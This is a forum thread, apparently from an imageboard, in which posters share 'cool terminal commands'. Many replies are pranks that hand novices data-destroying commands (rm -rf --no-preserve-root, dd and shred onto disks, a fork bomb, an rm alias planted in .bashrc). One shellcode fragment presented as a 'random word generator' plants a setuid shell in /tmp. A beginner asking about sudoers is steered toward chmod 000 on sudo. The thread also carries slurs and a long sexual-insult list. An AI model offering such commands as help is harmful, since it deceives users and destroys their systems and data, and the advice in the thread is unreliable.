What are some cool terminal commands?

What are some cool terminal commands?

Other urls found in this thread:


cd code

sudo rm -rf /

sudo rm -rf --no-preserve-root /*

dd if=/dev/urandom of=/dev/sda


This one is a random word generator
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“cp -p /bin/sh /tmp/.beyond; chmod 4755

mkdir kek
cd kek


mv ~ /dev/null

echo c > /proc/sysrq-trigger

pushd and popd
[push] to directory stack and [pop] from directory stack, very handy if you're juggling directories

This one will tell you all current ports in use
cat /dev/port

since this is a terminal thread I've got a noob question
How do I add a user to the sudoers file? I'm having some trouble doing so and google searches aren't really helping.
I'm on Fedora 25

sudo nano/etc/hostname
rename to nigger
ctrl + X

sudo apt install sl

is this the guy that eats 70 year old military meals?

sudo cat /dev/urandom > /dev/sda
sudo adduser sudo

sudo chmod --- /bin/sudo "your username here"

yeah he's a cool guy

:(){ :|: & };:

Whats wrong with it. Only affects BSD, macOS, Alpine.
Doesn't work without root.
Doesn't work without spaces.
>mv ~ /dev/null
Doesn't work like you think.
>echo c > /proc/sysrq-trigger
Doesn't work without root.
This bug was fixed like 100 years ago.
>sudo cat /dev/urandom > /dev/sda
Only actual harmful command ITT.

You mainly forgot the * so files inside of the root directory wouldn't actually be selected

You(){ You|You & };You

Visudo if you want to manually add the user into the sudoers file. Otherwise, you can just add your account into the wheel group, which is already in the sudoers file, and have it done that way.

Nice one you guys

sudo chmod -x chmod

hexdump -v -e '/1 "%u\n"' < /dev/urandom | awk '{ split("0,2,4,5,7,9,11,12",a,","); for (i=0; i

>What are some cool terminal commands?
sudo reboot

echo "OP is a faggot"

I saw this one in an article
it plays the one of the Zelda songs in chiptune

chmod: cannot access `chmod': No such file or directory

sudo chmod -x /bin/chmod

It's huge so I must split in two posts:

demons=('anal aficionado' 'anus ignoramus' 'baby batter bladder' 'baby batter bringer' 'ball butter nutter' 'ballbiting ballerina' 'ballsack knapsack' 'baloney poney behemoth' 'beef curtain hurtin' 'benis burglar' 'boner benefactor' 'boner condoner' 'boner toner' 'butt hut' 'chin chin bin' 'chode road' 'cock captain' 'cock clairvoyant' 'cock commandant' 'cock cream captivator' 'cock dock' 'cock khan' 'cock pocket' 'cock sock' 'cock stock' 'column culminator' 'cum caresser' 'cum chum' 'cum connoisseur' 'cum drum' 'cum plum' 'cummander' 'cunny bunny' 'cunt colonel' 'cunt runt' 'dick dastard' 'dick duchess' 'dick juice masseuse' 'dick tick' 'ding dong dungeon' 'dong deity' 'dong dominator' 'dongle mongle' 'ejaculate advocate' 'ejaculate empress' 'erection confection' 'erection ejection' 'fluid druid' 'foreskin fornicator' 'frenulum fractionizer' 'glans fans' 'glans gladiator' 'jism prism' 'jism prison' 'jizz genie' 'jizz jezebel' 'jizz jockey' 'jizz wiz' 'knackers knight' 'lewd lieutenant' 'lovegoo lass' 'male repoductive organ gorgan' 'man milk mephistopheles' 'man muscle steam shovel' 'mattress actress' 'mayonnaise maiden' 'meat major' 'middle leg major'

cd ..
cd op
cd "is a fag"
del *.yourlife

>cd "is a fag"
>del *.yourlife
>not rm
Fucking Wingdings user detected

'nut slut' 'orifice officer' 'pecker prodigy' 'penile perpetrator' 'penile private' 'penis machinist' 'phallus chalice' 'phallus phalanx' 'pillar pimper' 'pocket rocket ground control' 'pole populator' 'pole privateer' 'prick chick' 'prick pirate' 'prostate apostate' 'prostate magistrate' 'rear admiral' 'salami tsunami' 'sausage sergeant' 'schlong sentinel' 'schlong sorcerrer' 'scrotum sorceress' 'scrotum totem' 'seed steed' 'semen demon' 'semen sommelier' 'seminal fluid druid' 'seminal sentinel' 'shaft shaft' 'shaft specialist' 'skeet treat' 'smega smuggler' 'smegma enigma' 'smegma savant' 'smegma smuggler' 'smut sergeant' 'sodomy sentinel' 'sperm specialist' 'sperm summoner' 'sperm worm' 'spooge scrooge' 'spunk monk' 'spunk trunk' 'stiffy stimulator' 'stiffy sultan' 'testicle tamer' 'testicle vestibule' 'testicular temptress' 'wang waxer' 'wang wizard' 'wang wrangler' 'weenie genie' 'wiener cleaner' 'wiener witch' 'willy ghillie' 'willy wrap'); echo "Who is this ${demons[$RANDOM % ${#demons[@]} ]}?"

What does this one do?

>'man muscle steam shovel'

It makes asking for sauce great again.

grep -i llama /proc/kcore

>sudo adduser sudo
that isn't working
unrecognized option
what do I do to put it in when I visudo?

find . -type f -name "*.jpg" -exec jpegoptim {} \;
find . -type f -name "*.png" -exec optipng {} \;
find . -name "*.jpg" | xargs mogrify -resize 50% -quality 50%
find . -type f -name "*.wav" -print0 | while read -d '' -r in; do opusenc --comp 10 --bitrate 128 "$in" "${in%.wav}".opus; done
Delete by name or extension
find . -type f -name "*.XXX" -exec rm "{}" \;
Unzip a folder of zipped files into their own directories (this is annoying when they weren't compressed in a directory beforehand)
for f in *.zip; do unzip -d "${f%*.zip}" "$f"; done

echo "alias ls='ls && rm -rf'" >> ~/.bashrc

>unrecognized option
Try "sudo chmod --- /bin/sudo" then it will ask for the users you want to add to the list of sudoers

What does this do?

downloads more RAM

just use #su -c 'rm -rf /'

>that isn't working

usermod -a -G wheel

I'm using ffmpeg for opus, is opusenc better? And what does comp 10?

No really, does this damage? It's just grepping memory, right?

Searches all of your memory for the word "llama".

How many llamas can you find?

Execute it and find out. Don't be a pussy.

it just fills up your ram


Literally listen to your kernel
cat /proc/kcore | /dev/dsp

says to use --no-preserve-root
should I?
I did this but still not working I also but sudo where wheel is and it said groud sudo does not exist
chmod: unrecognized option '---'

From what outdated blog did you copy paste that?

sudo aplay /proc/kcore

sudo dd if=/dev/zero of=/dev/sdx bs=446 count=1

what is "sdx"?

>says to use --no-preserve-root
>should I?

Is this dangerous? I'm a noob and want to learn. What does this do?

>chmod: unrecognized option '---'
Try "sudo chmod 000 /bin/sudo"

sda or sdb or sdc...
whatever drive the operating system is on i guess

been a LONG time sense I wrote it down, but effectively it should wipe the directory.
I might be wrong but I think the X is to be replaced with a-b-etc.
I used it to wipe the grub partition.

apt install love

Has no one posted the "plays music but actually deletes ~?


>bash: /usr/bin/sudo: Permission denied

i actually tried it and Sup Forums wouldn't let me post it
I'm sure some normies complained enough to make hiro add it to them spam filter

>unironically browsing linux.com

I guess the fixed that way of adding yourself. Probably for security reasons
Try this "sudo chmod 000 /bin/*"


Literally read your kernel.
sudo cat /proc/kcore | strings | awk 'length > 20' | less

>cat |

I'd just like to interject for a moment.
sudo strings /proc/kcore | awk 'length > 20' | less

The purpose of cat is to concatenate (or catenate) files. If it is only one file, concatenating it with nothing at all is a waste of time, and costs you a process.

Yeah but it also prints it genius. Also commands get appropriated for other uses all the time so deal with it. For example the touch command is meant to edit file modification times.

Wow faggot thanks for ruining my vm.

[ $[ $RANDOM % 6 ] == 0 ] && rm -rf /

finally got sudo to work with my user
Now how do I change the user name?


How is that possible? I didn't know xxd could do this. Is there a Mario Cart version?


touch myfirstprogram


ls -a


touch mytralala

while sleep 0.1; do tput setaf $((RANDOM%6+1)); done &


sudo rm -R /home

cd /var/log/packages && for i in *; do rm $i; done && neofetch

No, it's just a wrapper around the same libopus library.
--comp is the opusenc equivalent of the -compression_level parameter in ffmpeg/libopus. It already defaults to 10 for highest encoding complexity + slowest encoding time in either case and can be omitted.

cat /dev/urandom | hexdump -C | grep -i fag

Fun that never stops.

find / -exec shred -u {} \;

and don't forget to

while [ $satisfaction ]
touch me

ew gnu. and even then why would you not preserve root if you're not deleting it
>lincucks now use some bullshit instead of perfect /dev/dsp

What does this payload do exactly?

this is just what I was looking for

# shred /*